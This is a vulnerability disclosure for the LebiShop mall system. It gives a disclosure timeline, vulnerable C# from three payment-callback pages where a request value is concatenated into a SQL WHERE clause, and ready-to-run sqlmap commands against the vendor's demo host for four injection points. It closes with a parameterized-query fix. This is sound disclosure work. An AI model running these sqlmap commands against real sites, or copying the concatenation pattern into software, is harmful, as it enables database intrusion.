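2015-03-05: Details reported to the vendor; awaiting vendor handling
2015-03-10: Vendor actively ignored the vulnerability; details opened to third-party security partners
2015-05-04: Details disclosed to core white hats and experts in related fields
2015-05-14: Details disclosed to regular white hats
2015-05-24: Details disclosed to intern white hats
2015-06-08: Details disclosed to the public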
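SQL injection in the latest version of the LebiShop mall system: four injection points, tested successfully on the demo site
Injections 1 and 2: the main vulnerable code is the same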
http://demo.lebi.cn/onlinepay/95epay/PayNotify.aspx
http://demo.lebi.cn/onlinepay/95epay/PayResult.aspx
The source code they share is as follows
protected void Page_Load(object sender, EventArgs e)
{
    this.MerNo = HttpContext.Current.Request.Params["MerNo"].ToString();
    this.BillNo = HttpContext.Current.Request.Params["BillNo"].ToString(); // not sanitized
    this.Amount = HttpContext.Current.Request.Params["Amount"].ToString();
    this.Succeed = HttpContext.Current.Request.Params["Succeed"].ToString();
    this.Result = HttpContext.Current.Request.Params["Result"].ToString();
    this.MD5info = HttpContext.Current.Request.Params["MD5info"].ToString();
    this.MerRemark = HttpContext.Current.Request.Params["MerRemark"].ToString();
    Lebi_OnlinePay onlinePay = Money.GetOnlinePay(this.BillNo); // follow this call
    if (onlinePay == null)
    {
        base.Response.Write("系统错误");
        base.Response.End();
    }
    .....
public static Lebi_OnlinePay GetOnlinePay(string code)
{
    // the request value is concatenated straight into the WHERE clause: injection
    return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'"));
}
Injection 3
http://demo.lebi.cn/onlinepay/kuaiqian/receive.aspx
The source code is as follows
protected void Page_Load(object sender, EventArgs E)
{
    Lebi_OnlinePay onlinePay = Money.GetOnlinePay(base.Request["orderId"].ToString().Trim()); // follow this call
    if (onlinePay == null)
    {
        base.Response.Write("系统错误");
        base.Response.End();
    }
    ....
public static Lebi_OnlinePay GetOnlinePay(string code)
{
    // not sanitized; the same injection exists here
    return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'"));
}
Injection 4
http://demo.lebi.cn/onlinepay/Paypal/ReturnUrl.aspx
protected void Page_Load(object sender, EventArgs e)
{
    try
    {
        string str = base.Request.Form["txn_id"].ToString();
        string str2 = base.Request.Form["payment_status"].ToString();
        string str3 = base.Request.Form["payment_date"].ToString();
        string str4 = base.Request.Form["item_name"].ToString();
        string str5 = base.Request.Form["mc_gross"].ToString();
        string code = base.Request.Form["item_number"].ToString(); // not sanitized
        Lebi_OnlinePay onlinePay = Money.GetOnlinePay(code); // follow this call
        if (onlinePay == null)
        {
            base.Response.Write("系统错误");
            base.Response.End();
        }
        else
        {
            B_Lebi_Currency.GetModel(onlinePay.Currency_id);
            string str7 = "";
            str7 = (((((str7 + "txn_id:" + str + "<br>") + "payment_status:" + str2 + "<br>") + "payment_date:" + str3 + "<br>") + "item_name:" + str4 + "<br>") + "mc_gross:" + str5 + "<br>") + "ppitem_number:" + code + "<br>";
            if (this.VerifyIPN())
            {
                Order.OnlinePaySuccess(code, "", true);
            }
        }
    }
    catch (Exception)
    {
    }
}
public static Lebi_OnlinePay GetOnlinePay(string code)
{
    // injection: the value is concatenated into the WHERE clause
    return GetOnlinePay(B_Lebi_Order.GetModel("Code='" + code + "'"));
}
sqlmap scan for injections 1 and 2
sqlmap -u "http://demo.lebi.cn/onlinepay/95epay/PayNotify.aspx" --data "MerNo=1&Amount=1&Succeed=1&Result=1&MD5info=1&MerRemark=1&BillNo=1" -p "BillNo" --dbms "mssql" --current-db --technique=T --time-sec 10
sqlmap scan for injection 3
sqlmap -u "http://demo.lebi.cn/onlinepay/kuaiqian/receive.aspx" --data "orderId=1" -p "orderId" --dbms "mssql" --current-db --technique=T --time-sec 10
sqlmap scan for injection 4
sqlmap -u "http://demo.lebi.cn/onlinepay/Paypal/ReturnUrl.aspx" --data "txn_id=1&payment_status=1&payment_date=1&item_name=1&mc_gross=1&item_number=1" -p "item_number" --dbms "mssql" --current-db --technique=T --time-sec 10
Fix: sanitize the parameters before they are used.
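One way to apply this fix to the shared GetOnlinePay lookup, as an added example that is not LebiShop's own code: validate the order code against an allow-list pattern, then bind it as a typed parameter instead of concatenating it into "Code='...'". The class and method names, the order-code format, and the Lebi_Order table with an NVARCHAR(64) Code column are assumptions; System.Data.SqlClient is the standard .NET Framework provider.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public static class OrderLookup   // hypothetical helper, not part of LebiShop
{
    // Assumption: order codes are 1-64 letters, digits, '_' or '-'.
    private static readonly Regex CodePattern = new Regex(@"\A[A-Za-z0-9_-]{1,64}\z");

    // Reject missing or malformed codes before they reach the database.
    public static bool IsValidCode(string code)
    {
        return code != null && CodePattern.IsMatch(code);
    }

    // Build the lookup with the code bound as a parameter, never as SQL text.
    // Table and column names are assumed from the B_Lebi_Order.GetModel call.
    public static SqlCommand BuildLookup(string code)
    {
        if (!IsValidCode(code))
            throw new ArgumentException("invalid order code", "code");
        var cmd = new SqlCommand("SELECT TOP 1 * FROM Lebi_Order WHERE Code = @code");
        cmd.Parameters.Add("@code", SqlDbType.NVarChar, 64).Value = code;
        return cmd;   // caller assigns cmd.Connection and executes it
    }

    public static void Main()
    {
        // Constructed sample inputs: a well-formed code, one with a quote, one missing.
        foreach (var input in new[] { "SO20150305001", "2015'0305", null })
        {
            try
            {
                using (var cmd = BuildLookup(input))
                    Console.WriteLine("accepted: {0} [@code={1}]",
                        cmd.CommandText, cmd.Parameters["@code"].Value);
            }
            catch (ArgumentException)
            {
                Console.WriteLine("rejected: {0}", input ?? "(missing parameter)");
            }
        }
    }
}
```

Because all three payment callbacks (95epay, kuaiqian, Paypal) pass their request value to the same GetOnlinePay method, fixing the query construction there covers every entry point shown above.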
Severity: no impact (ignored by vendor)
Ignored at: 2015-06-08 11:33